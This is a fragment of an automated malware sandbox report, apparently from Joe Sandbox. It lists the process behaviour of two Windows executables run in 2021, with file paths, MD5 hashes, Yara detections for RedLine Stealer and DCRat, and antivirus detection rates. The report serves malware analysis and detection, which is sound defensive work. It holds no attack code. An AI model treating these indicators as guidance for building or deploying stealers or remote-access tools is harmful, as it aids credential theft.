                                                                                                                                                                                Data Ascii: description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="AMD64" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></depe


                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                Statistics

                                                                                                                                                                                Behavior

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                System Behavior

                                                                                                                                                                                General

                                                                                                                                                                                Start time:07:23:03
                                                                                                                                                                                Start date:19/10/2021
                                                                                                                                                                                Path:C:\Users\user\Desktop\MVB56JJDeJ.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:'C:\Users\user\Desktop\MVB56JJDeJ.exe'
                                                                                                                                                                                Imagebase:0x500000
                                                                                                                                                                                File size:843264 bytes
                                                                                                                                                                                MD5 hash:E551858D7C25A5874AC81A13CA3CA24D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.731038018.0000000000160000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.732418954.00000000010C0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.732036861.00000000009B1000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.731086479.0000000000191000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.735106738.0000000003E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Start time:07:23:36
                                                                                                                                                                                Start date:19/10/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\123.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\123.exe'
                                                                                                                                                                                Imagebase:0x120000
                                                                                                                                                                                File size:3432464 bytes
                                                                                                                                                                                MD5 hash:8A0FAE504673180E1BB94C93260C2D7F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.926446658.0000000004437000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 29%, Metadefender, Browse
                                                                                                                                                                                • Detection: 39%, ReversingLabs
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Disassembly

                                                                                                                                                                                Code Analysis

                                                                                                                                                                                Reset < >